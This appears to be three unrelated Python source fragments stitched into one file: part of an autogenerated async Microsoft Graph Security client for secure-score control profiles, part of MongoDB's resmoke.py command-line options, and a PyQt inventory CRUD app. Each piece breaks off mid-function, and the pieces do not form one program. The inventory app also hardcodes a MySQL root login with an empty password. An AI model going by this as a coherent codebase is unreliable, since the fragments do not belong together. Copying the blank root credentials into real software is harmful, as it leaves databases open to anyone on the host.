error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_secure_score_control_profiles.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphSecureScoreControlProfile')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphSecureScoreControlProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_secure_score_control_profiles.metadata = {'url': '/Security/secureScoreControlProfiles'} # type: ignore
async def get_secure_score_control_profiles(
self,
secure_score_control_profile_id: str,
select: Optional[List[Union[str, "models.Enum22"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> "models.MicrosoftGraphSecureScoreControlProfile":
"""Get secureScoreControlProfiles from Security.
Get secureScoreControlProfiles from Security.
:param secure_score_control_profile_id: key: id of secureScoreControlProfile.
:type secure_score_control_profile_id: str
:param select: Select properties to be returned.
:type select: list[str or ~security.models.Enum22]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphSecureScoreControlProfile, or the result of cls(response)
:rtype: ~security.models.MicrosoftGraphSecureScoreControlProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphSecureScoreControlProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_secure_score_control_profiles.metadata['url'] # type: ignore
path_format_arguments = {
'secureScoreControlProfile-id': self._serialize.url("secure_score_control_profile_id", secure_score_control_profile_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphSecureScoreControlProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_secure_score_control_profiles.metadata = {'url': '/Security/secureScoreControlProfiles/{secureScoreControlProfile-id}'} # type: ignore
async def update_secure_score_control_profiles(
self,
secure_score_control_profile_id: str,
body: "models.MicrosoftGraphSecureScoreControlProfile",
**kwargs
) -> None:
"""Update the navigation property secureScoreControlProfiles in Security.
Update the navigation property secureScoreControlProfiles in Security.
:param secure_score_control_profile_id: key: id of secureScoreControlProfile.
:type secure_score_control_profile_id: str
:param body: New navigation property values.
:type body: ~security.models.MicrosoftGraphSecureScoreControlProfile
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_secure_score_control_profiles.metadata['url'] # type: ignore
path_format_arguments = {
'secureScoreControlProfile-id': self._serialize.url("secure_score_control_profile_id", secure_score_control_profile_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphSecureScoreControlProfile')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_secure_score_control_profiles.metadata = {'url': '/Security/secureScoreControlProfiles/{secureScoreControlProfile-id}'} # type: ignore
async def delete_secure_score_control_profiles(
self,
secure_score_control_profile_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property secureScoreControlProfiles for Security.
Delete navigation property secureScoreControlProfiles for Security.
:param secure_score_control_profile_id: key: id of secureScoreControlProfile.
:type secure_score_control_profile_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_secure_score_control_profiles.metadata['url'] # type: ignore
path_format_arguments = {
'secureScoreControlProfile-id': self._serialize.url("secure_score_control_profile_id", secure_score_control_profile_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_secure_score_control_profiles.metadata = {'url': '/Security/secureScoreControlProfiles/{secureScoreControlProfile-id}'} # type: ignore
def list_secure_scores(
self,
orderby: Optional[List[Union[str, "models.Enum23"]]] = None,
select: Optional[List[Union[str, "models.Enum24"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> AsyncIterable["models.CollectionOfSecureScore"]:
"""Get secureScores from Security.
Get secureScores from Security.
:param orderby: Order items by property values.
:type orderby: list[str or ~security.models.Enum23]
:param select: Select properties to be returned.
:type select: list[str or ~security.models.Enum24]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfSecureScore or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~security.models.CollectionOfSecureScore]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfSecureScore"]
error_map = {
401: ClientAuthenticationError, 404: | |
"--backupOnRestartDir", action="store", type=str, dest="backup_on_restart_dir",
metavar="DIRECTORY", help=
"Every time a mongod restarts on existing data files, the data files will be backed up underneath the input directory."
)
parser.add_argument(
"--replayFile", action="store", type=str, dest="replay_file", metavar="FILE", help=
"Run the tests listed in the input file. This is an alternative to passing test files as positional arguments on the command line. Each line in the file must be a path to a test file relative to the current working directory. A short-hand for `resmoke run --replay_file foo` is `resmoke run @foo`."
)
parser.add_argument(
"--mrlog", action="store_const", const="mrlog", dest="mrlog", help=
"Pipe output through the `mrlog` binary for converting logv2 logs to human readable logs."
)
parser.add_argument(
"--userFriendlyOutput", action="store", type=str, dest="user_friendly_output",
metavar="FILE", help=
"Have resmoke redirect all output to FILE. Additionally, stdout will contain lines that typically indicate that the test is making progress, or an error has happened. If `mrlog` is in the path it will be used. `tee` and `egrep` must be in the path."
)
parser.add_argument(
"--runAllFeatureFlagTests", dest="run_all_feature_flag_tests", action="store_true",
help=
"Run MongoDB servers with all feature flags enabled and only run tests tags with these feature flags"
)
parser.add_argument(
"--runAllFeatureFlagsNoTests", dest="run_all_feature_flags_no_tests",
action="store_true", help=
"Run MongoDB servers with all feature flags enabled but don't run any tests tagged with these feature flags; used for multiversion suites"
)
parser.add_argument("--additionalFeatureFlags", dest="additional_feature_flags",
action="append", metavar="featureFlag1, featureFlag2, ...",
help="Additional feature flags")
parser.add_argument("--maxTestQueueSize", type=int, dest="max_test_queue_size",
help=argparse.SUPPRESS)
mongodb_server_options = parser.add_argument_group(
title=_MONGODB_SERVER_OPTIONS_TITLE,
description=("Options related to starting a MongoDB cluster that are forwarded from"
" resmoke.py to the fixture."))
mongodb_server_options.add_argument(
"--mongod", dest="mongod_executable", metavar="PATH",
help="The path to the mongod executable for resmoke.py to use.")
mongodb_server_options.add_argument(
"--mongos", dest="mongos_executable", metavar="PATH",
help="The path to the mongos executable for resmoke.py to use.")
mongodb_server_options.add_argument(
"--mongodSetParameters", dest="mongod_set_parameters", action="append",
metavar="{key1: value1, key2: value2, ..., keyN: valueN}",
help=("Passes one or more --setParameter options to all mongod processes"
" started by resmoke.py. The argument is specified as bracketed YAML -"
" i.e. JSON with support for single quoted and unquoted keys."))
mongodb_server_options.add_argument(
"--mongosSetParameters", dest="mongos_set_parameters", action="append",
metavar="{key1: value1, key2: value2, ..., keyN: valueN}",
help=("Passes one or more --setParameter options to all mongos processes"
" started by resmoke.py. The argument is specified as bracketed YAML -"
" i.e. JSON with support for single quoted and unquoted keys."))
mongodb_server_options.add_argument(
"--dbpathPrefix", dest="dbpath_prefix", metavar="PATH",
help=("The directory which will contain the dbpaths of any mongod's started"
" by resmoke.py or the tests themselves."))
mongodb_server_options.add_argument(
"--majorityReadConcern", action="store", dest="majority_read_concern", choices=("on",
"off"),
metavar="ON|OFF", help=("Enable or disable majority read concern support."
" Defaults to %(default)s."))
mongodb_server_options.add_argument("--flowControl", action="store", dest="flow_control",
choices=("on", "off"), metavar="ON|OFF",
help=("Enable or disable flow control."))
mongodb_server_options.add_argument("--flowControlTicketOverride", type=int, action="store",
dest="flow_control_tickets", metavar="TICKET_OVERRIDE",
help=("Number of tickets available for flow control."))
mongodb_server_options.add_argument("--storageEngine", dest="storage_engine",
metavar="ENGINE",
help="The storage engine used by dbtests and jstests.")
mongodb_server_options.add_argument(
"--storageEngineCacheSizeGB", dest="storage_engine_cache_size_gb", metavar="CONFIG",
help="Sets the storage engine cache size configuration"
" setting for all mongod's.")
mongodb_server_options.add_argument(
"--numReplSetNodes", type=int, dest="num_replset_nodes", metavar="N",
help="The number of nodes to initialize per ReplicaSetFixture. This is also "
"used to indicate the number of replica set members per shard in a "
"ShardedClusterFixture.")
mongodb_server_options.add_argument(
"--numShards", type=int, dest="num_shards", metavar="N",
help="The number of shards to use in a ShardedClusterFixture.")
mongodb_server_options.add_argument(
"--wiredTigerCollectionConfigString", dest="wt_coll_config", metavar="CONFIG",
help="Sets the WiredTiger collection configuration setting for all mongod's.")
mongodb_server_options.add_argument(
"--wiredTigerEngineConfigString", dest="wt_engine_config", metavar="CONFIG",
help="Sets the WiredTiger engine configuration setting for all mongod's.")
mongodb_server_options.add_argument(
"--wiredTigerIndexConfigString", dest="wt_index_config", metavar="CONFIG",
help="Sets the WiredTiger index configuration setting for all mongod's.")
mongodb_server_options.add_argument("--transportLayer", dest="transport_layer",
metavar="TRANSPORT",
help="The transport layer used by jstests")
mongodb_server_options.add_argument(
"--fuzzMongodConfigs", dest="fuzz_mongod_configs", action="store_true",
help="Will randomly choose storage configs that were not specified.")
mongodb_server_options.add_argument("--configFuzzSeed", dest="config_fuzz_seed",
metavar="PATH",
help="Sets the seed used by storage config fuzzer")
internal_options = parser.add_argument_group(
title=_INTERNAL_OPTIONS_TITLE,
description=("Internal options for advanced users and resmoke developers."
" These are not meant to be invoked when running resmoke locally."))
internal_options.add_argument(
"--log", dest="logger_file", metavar="LOGGER",
help=("A YAML file that specifies the logging configuration. If the file is"
" located in the resmokeconfig/suites/ directory, then the basename"
" without the .yml extension can be specified, e.g. 'console'."))
# Used for testing resmoke.
#
# `is_inner_level`:
# Marks the resmoke process as a child of a parent resmoke process, meaning that"
# it was started by a shell process which itself was started by a top-level"
# resmoke process. This is used to ensure the hang-analyzer is called properly."
#
# `test_archival`:
# Allows unit testing of resmoke's archival feature where we write out the names
# of the files to be archived, instead of doing the actual archival, which can
# be time and resource intensive.
#
# `test_analysis`:
# When specified, the hang-analyzer writes out the pids it will analyze without
# actually running analysis, which can be time and resource intensive.
internal_options.add_argument("--internalParam", action="append", dest="internal_params",
help=argparse.SUPPRESS)
internal_options.add_argument("--perfReportFile", dest="perf_report_file",
metavar="PERF_REPORT",
help="Writes a JSON file with performance test results.")
internal_options.add_argument("--cedarReportFile", dest="cedar_report_file",
metavar="CEDAR_REPORT",
help="Writes a JSON file with performance test results.")
internal_options.add_argument(
"--reportFailureStatus", action="store", dest="report_failure_status",
choices=("fail", "silentfail"), metavar="STATUS",
help="Controls if the test failure status should be reported as failed"
" or be silently ignored (STATUS=silentfail). Dynamic test failures will"
" never be silently ignored. Defaults to STATUS=%(default)s.")
internal_options.add_argument(
"--reportFile", dest="report_file", metavar="REPORT",
help="Writes a JSON file with test status and timing information.")
internal_options.add_argument(
"--staggerJobs", action="store", dest="stagger_jobs", choices=("on", "off"),
metavar="ON|OFF", help=("Enables or disables the stagger of launching resmoke jobs."
" Defaults to %(default)s."))
internal_options.add_argument(
"--exportMongodConfig", dest="export_mongod_config", choices=("off", "regular",
"detailed"),
help=("Exports a yaml containing the history of each mongod config option to"
" {nodeName}_config.yml."
" Defaults to 'off'. A 'detailed' export will include locations of accesses."))
evergreen_options = parser.add_argument_group(
title=_EVERGREEN_ARGUMENT_TITLE, description=(
"Options used to propagate information about the Evergreen task running this"
" script."))
evergreen_options.add_argument("--evergreenURL", dest="evergreen_url",
metavar="EVERGREEN_URL",
help=("The URL of the Evergreen service."))
evergreen_options.add_argument(
"--archiveLimitMb", type=int, dest="archive_limit_mb", metavar="ARCHIVE_LIMIT_MB",
help=("Sets the limit (in MB) for archived files to S3. A value of 0"
" indicates there is no limit."))
evergreen_options.add_argument(
"--archiveLimitTests", type=int, dest="archive_limit_tests",
metavar="ARCHIVE_LIMIT_TESTS",
help=("Sets the maximum number of tests to archive to S3. A value"
" of 0 indicates there is no limit."))
evergreen_options.add_argument("--buildId", dest="build_id", metavar="BUILD_ID",
help="Sets the build ID of the task.")
evergreen_options.add_argument("--buildloggerUrl", action="store", dest="buildlogger_url",
metavar="URL",
help="The root url of the buildlogger server.")
evergreen_options.add_argument(
"--distroId", dest="distro_id", metavar="DISTRO_ID",
help=("Sets the identifier for the Evergreen distro running the"
" tests."))
evergreen_options.add_argument(
"--executionNumber", type=int, dest="execution_number", metavar="EXECUTION_NUMBER",
help=("Sets the number for the Evergreen execution running the"
" tests."))
evergreen_options.add_argument(
"--gitRevision", dest="git_revision", metavar="GIT_REVISION",
help=("Sets the git revision for the Evergreen task running the"
" tests."))
# We intentionally avoid adding a new command line option that starts with --suite so it doesn't
# become ambiguous with the --suites option and break how engineers run resmoke.py locally.
evergreen_options.add_argument(
"--originSuite", dest="origin_suite", metavar="SUITE",
help=("Indicates the name of the test suite prior to the"
" evergreen_generate_resmoke_tasks.py script splitting it"
" up."))
evergreen_options.add_argument(
"--patchBuild", action="store_true", dest="patch_build",
help=("Indicates that the Evergreen task running the tests is a"
" patch build."))
evergreen_options.add_argument(
"--projectName", dest="project_name", metavar="PROJECT_NAME",
help=("Sets the name of the Evergreen project running the tests."))
evergreen_options.add_argument("--revisionOrderId", dest="revision_order_id",
metavar="REVISION_ORDER_ID",
help="Sets the chronological order number of this commit.")
evergreen_options.add_argument("--tagFile", action="append", dest="tag_files",
metavar="TAG_FILES",
help="One or more YAML files that associate tests and tags.")
evergreen_options.add_argument(
"--taskName", dest="task_name", metavar="TASK_NAME",
help="Sets the name of the Evergreen task running the tests.")
evergreen_options.add_argument("--taskId", dest="task_id", metavar="TASK_ID",
help="Sets the Id of the Evergreen task running the tests.")
evergreen_options.add_argument(
"--variantName", dest="variant_name", metavar="VARIANT_NAME",
help=("Sets the name of the Evergreen build variant running the"
" tests."))
evergreen_options.add_argument("--versionId", dest="version_id", metavar="VERSION_ID",
help="Sets the version ID of the task.")
benchmark_options = parser.add_argument_group(
title=_BENCHMARK_ARGUMENT_TITLE,
description="Options for running Benchmark/Benchrun tests")
benchmark_options.add_argument("--benchmarkFilter", type=str, dest="benchmark_filter",
metavar="BENCHMARK_FILTER",
help="Regex to filter Google benchmark tests to run.")
benchmark_options.add_argument(
"--benchmarkListTests",
dest="benchmark_list_tests",
action="store_true",
# metavar="BENCHMARK_LIST_TESTS",
help=("Lists all Google benchmark test configurations in each"
" test file."))
benchmark_min_time_help = (
"Minimum time to run each benchmark/benchrun test for. Use this option instead of "
"--benchmarkRepetitions to make a test run for a longer or shorter duration.")
benchmark_options.add_argument("--benchmarkMinTimeSecs", type=int,
dest="benchmark_min_time_secs", metavar="BENCHMARK_MIN_TIME",
help=benchmark_min_time_help)
benchmark_repetitions_help = (
"Set --benchmarkRepetitions=1 if you'd like to run the benchmark/benchrun tests only once."
" By default, each test is run multiple times to provide statistics on the variance"
| |
"border: 2px white;"
"border-radius: 5px;"
"padding: 0 8px;"
"font-size: 12px;}"
"QLineEdit:focus { "
"background-color:rgb(0 0, 0,0);}"
);
self.updatedvaluebox.move(395, 345)
self.updatedvaluebox.resize(150, 20)
self.updatedvaluebox.setMaxLength(15)
self.updatedvaluebox.setValidator(QIntValidator())
self.updatedvaluebox.setMaxLength(0)
self.updatebutton = QPushButton('Update', self)
self.updatebutton.setStyleSheet("QPushButton{ border: 2px solid #e6e6ff; border-radius: 10px;"
"color: #ffccdd;"
"background-color: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #e60000, stop: 1 #EA485F);"
"min-width: 80px;}"
)
self.updatebutton.move(430, 375)
self.updatebutton.setEnabled(False)
self.updatebutton.clicked.connect(self.Update)
# ----DELETE LABEL -----------------
self.deletelabel = QLabel('Delete Products', self)
self.deletelabel.setStyleSheet("QLabel{"
"font: 15pt Doppio One;"
"color: #ffffff;}"
);
self.deletelabel.move(575, 175)
self.deleteprodlabel = QLabel('Product Code: ', self)
self.deleteprodlabel.setStyleSheet("QLabel{"
"font: 10pt Doppio One;"
"color: #ffffff;}"
);
self.deleteprodlabel.move(570, 220)
self.deleteprodbox = QLineEdit(self)
self.deleteprodbox.setStyleSheet("QLineEdit{ "
"border: 2px white;"
"border-radius: 5px;"
"padding: 0 8px;"
"font-size: 12px;}"
"QLineEdit:focus { "
"background-color:rgb(0 0, 0,0);}"
);
self.deleteprodbox.move(570, 245)
self.deleteprodbox.resize(150, 20)
self.deleteprodbox.setMaxLength(15)
self.deletebutton = QPushButton('Delete', self)
self.deletebutton.setStyleSheet("QPushButton{ border: 2px solid #e6e6ff; border-radius: 10px;"
"color: #ffccdd;"
"background-color: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #e60000, stop: 1 #EA485F);"
"min-width: 80px;}"
)
self.deletebutton.move(600, 275)
self.deletebutton.clicked.connect(self.Delete)
# Upperusernametext---------------------
self.createlabel = QLabel('Hello, {}!'.format(loginaccount), self)
self.createlabel.setStyleSheet("QLabel{"
"font: 25pt Doppio One;"
"color: #ffffff;}"
);
self.createlabel.move(285, 50)
self.show()
# ----------------------------------------
# ----------------------END OF --- INSIDE FRAME CONTENTS--CRUD--------------------------------------------
# ----------------------Function for Adding Products to the Database--------------------------------------
def Add(self):
ProductCode = self.prodcodebox.text()
ProductName = self.prodnamebox.text()
ProductQTY = self.prodqtybox.text()
ProductPrice = self.prodpricebox.text()
ProductInfo = (ProductCode, ProductName, ProductQTY, ProductPrice)
NotBlank = True
for i in ProductInfo:
if (len(i) == 0):
NotBlank = False
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Do not leave an empty field")
self.msgbox.setWindowTitle("Cannot add the product")
self.msgbox.show()
break
if (NotBlank):
ProductQTY = int(ProductQTY)
ProductPrice = int(ProductPrice)
connection = pymysql.connect(host='localhost',
user='root',
password='',
db='danasdb',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
port=3306)
with connection.cursor() as cursor:
result = cursor.execute('select * from products where product_code = %s;', (ProductCode))
if (result == 1):
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Product already exist!")
self.msgbox.setWindowTitle("Cannot add the product")
self.msgbox.show()
else:
connection = pymysql.connect(host='localhost',
user='root',
password='',
db='danasdb',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
port=3306)
with connection.cursor() as cursor:
cursor.execute('insert into products values(%s,%s,%s,%s);',
(ProductCode, ProductName, ProductQTY, ProductPrice))
connection.commit()
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Successfully added")
self.msgbox.setWindowTitle("Cannot add the product")
self.msgbox.show()
# -----------------------END OF Function for Adding Products to the Database----------------------
# ----------------------Function for Viewing Products to the Database----------------------
def addproducts(self):
self.newWindow = Addproducts()
self.newWindow.show()
def View(self):
self.newWindow = Viewproducts()
self.newWindow.show()
# -----------------------Function for Updating Products to the Database----------------------
def UpdatedValue(self, index):
global UpdateSelect
UpdateSelect = self.selectupdatebox.itemText(index)
if (UpdateSelect == '...'):
self.updatebutton.setEnabled(False)
self.updatedvaluebox.clear()
self.updatedvaluebox.setMaxLength(0)
elif (UpdateSelect == 'Product Name'):
self.updatebutton.setEnabled(True)
self.updatedvaluebox.clear()
self.updatedvaluebox.setMaxLength(25)
self.updatedvaluebox.setValidator(None)
elif (UpdateSelect == 'Price' or UpdateSelect == 'Quantity'):
self.updatebutton.setEnabled(True)
self.updatedvaluebox.clear()
self.updatedvaluebox.setMaxLength(4)
self.updatedvaluebox.setValidator(QIntValidator())
def Update(self):
global UpdateSelect
ProductCode = self.updateprodbox.text()
UpdatedValue = self.updatedvaluebox.text()
if (len(ProductCode) == 0 or len(UpdatedValue) == 0):
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Empty field")
self.msgbox.setWindowTitle("Cannot update the product")
self.msgbox.show()
else:
connection = pymysql.connect(host='localhost',
user='root',
password='',
db='danasdb',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
port=3306)
with connection.cursor() as cursor:
result = cursor.execute('select * from products where product_code = %s;', (ProductCode))
if (result == 0):
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Product not found!")
self.msgbox.setWindowTitle("Cannot update the product")
self.msgbox.show()
elif (result == 1):
connection = pymysql.connect(host='localhost',
user='root',
password='',
db='danasdb',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
port=3306)
with connection.cursor() as cursor:
if UpdateSelect == 'Quantity':
cursor.execute('update products set product_qty = %s where product_code = %s',
(int(UpdatedValue), ProductCode))
connection.commit()
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Updated Successfully")
self.msgbox.setWindowTitle("Congrats!")
self.msgbox.show()
elif UpdateSelect == 'Product Name':
cursor.execute('update products set product_name = %s where product_code = %s',
(UpdatedValue, ProductCode))
connection.commit()
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Updated Successfully")
self.msgbox.setWindowTitle("Congrats!")
self.msgbox.show()
elif UpdateSelect == 'Price':
cursor.execute('update products set product_price = %s where product_code = %s',
(int(UpdatedValue), ProductCode))
connection.commit()
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Updated Successfully")
self.msgbox.setWindowTitle("Congrats!")
self.msgbox.show()
# -----------------------END OF Function for Updating Products to the Database----------------------
# ----------------------Function for Deleting Products to the Database----------------------
def Delete(self):
ProductCode = self.deleteprodbox.text()
NotBlank = True
if (len(self.deleteprodbox.text()) == 0):
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Do not leave an empyty field")
self.msgbox.setWindowTitle("Cannot add the product")
self.msgbox.show()
elif (NotBlank):
connection = pymysql.connect(host='localhost',
user='root',
password='',
db='danasdb',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
port=3306)
with connection.cursor() as cursor:
result = cursor.execute('select * from products where product_code = %s;', (ProductCode))
if (result == 0):
self.msgbox = QMessageBox()
self.msgbox.setIcon(QMessageBox.Information)
self.msgbox.setText("Product not found!")
self.msgbox.setWindowTitle("Cannot delete the product")
self.msgbox.show()
elif (result == 1):
connection = pymysql.connect(host='localhost',
user='root',
password='',
db='danasdb',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
port=3306)
with connection.cursor() as cursor:
cursor.execute('DELETE from products where product_code = %s;', (ProductCode))
connection.commit()
class Addproducts(QWidget):
def __init__(self):
super().__init__()
self.title = 'DANAS-INVENTORY' # Window Title
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(260, 100, 795, 525) # Window Size
self.setStyleSheet(
'QPushButton,QLabel,QLineEdit {font: 10pt Doppio One}') # Changes Font for Whole Window for QPushButton, QLabel, and QlineEdit
self.setFixedSize(self.size())
self.setWindowIcon(QIcon(r'C:\Users\XcomPh\Desktop\New folder (2)\ProjectDanas\Media Files\winicon.png'))
# Background
self.BackgroundHolder = QLabel(self)
self.Background = QPixmap(r'C:\Users\XcomPh\Desktop\New folder (2)\ProjectDanas\Media Files\winbackground.png')
self.BackgroundHolder.setPixmap(self.Background)
self.BackgroundHolder.move(0, 0)
self.BackgroundHolder.resize(795, 525)
self.BackgroundHolder.setScaledContents(True)
# -------CREATE LABELS AND QLINEEDIT ----------------
self.createlabel = QLabel('Add Products', self)
self.createlabel.setStyleSheet("QLabel{"
"font: 15pt Doppio One;"
"color: #ffffff;}"
);
self.createlabel.move(60, 175)
self.prodcodelabel = QLabel('Product Code: ', self)
self.prodcodelabel.setStyleSheet("QLabel{"
"font: 10pt Doppio One;"
"color: #ffffff;}"
);
self.prodcodelabel.move(45, 220)
self.prodcodebox = QLineEdit(self)
self.prodcodebox.setStyleSheet("QLineEdit{ "
"border: 2px white;"
"border-radius: 5px;"
"padding: 0 8px;"
"font-size: 12px;}"
"QLineEdit:focus { "
"background-color:rgb(0 0, 0,0);}"
);
self.prodcodebox.move(45, 245)
self.prodcodebox.resize(150, 20)
self.prodcodebox.setMaxLength(15)
self.prodnamelabel = QLabel('Product Name: ', self)
self.prodnamelabel.setStyleSheet("QLabel{"
"font: 10pt Doppio One;"
"color: #ffffff;}"
);
self.prodnamelabel.move(45, 270)
self.prodnamebox = QLineEdit(self)
self.prodnamebox.setStyleSheet("QLineEdit{ "
"border: 2px white;"
"border-radius: 5px;"
"padding: 0 8px;"
"font-size: 12px;}"
"QLineEdit:focus { "
"background-color:rgb(0 0, 0,0);}"
);
self.prodnamebox.move(45, 295)
self.prodnamebox.resize(150, 20)
self.prodnamebox.setMaxLength(15)
self.prodqtylabel = QLabel('QTY: ', self)
self.prodqtylabel.setStyleSheet("QLabel{"
"font: 10pt Doppio One;"
"color: #ffffff;}"
);
self.prodqtylabel.move(45, 320)
self.prodqtybox = QLineEdit(self)
self.prodqtybox.setStyleSheet("QLineEdit{ "
"border: 2px white;"
"border-radius: 5px;"
"padding: 0 8px;"
"font-size: 12px;}"
"QLineEdit:focus { "
"background-color:rgb(0 0, 0,0);}"
);
self.prodqtybox.move(45, 345)
self.prodqtybox.resize(150, 20)
self.prodqtybox.setMaxLength(15)
self.prodqtybox.setValidator(QIntValidator())
self.prodpricelabel = QLabel('Product Price: ', self)
self.prodpricelabel.setStyleSheet("QLabel{"
"font: 10pt Doppio One;"
"color: #ffffff;}"
);
self.prodpricelabel.move(45, 370)
self.prodpricebox = QLineEdit(self)
self.prodpricebox.setStyleSheet("QLineEdit{ "
"border: 2px white;"
"border-radius: 5px;"
"padding: 0 8px;"
"font-size: 12px;}"
"QLineEdit:focus { "
"background-color:rgb(0 0, 0,0);}"
);
self.prodpricebox.move(45, 395)
self.prodpricebox.resize(150, 20)
self.prodpricebox.setMaxLength(15)
self.prodpricebox.setValidator(QIntValidator())
self.addbutton = QPushButton('Add', self)
self.addbutton.setStyleSheet("QPushButton{ border: 2px solid #e6e6ff; border-radius: 10px;"
"color: #ffccdd;"
"background-color: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #e60000, stop: 1 #EA485F);"
"min-width: 80px;}"
)
self.addbutton.move(75, 430)
self.addbutton.clicked.connect(self.Add)
# ----------------------Function for Adding Products to the Database--------------------------------------
def Add(self):
ProductCode = self.prodcodebox.text()
ProductName = self.prodnamebox.text()
ProductQTY = self.prodqtybox.text()
ProductPrice = self.prodpricebox.text()
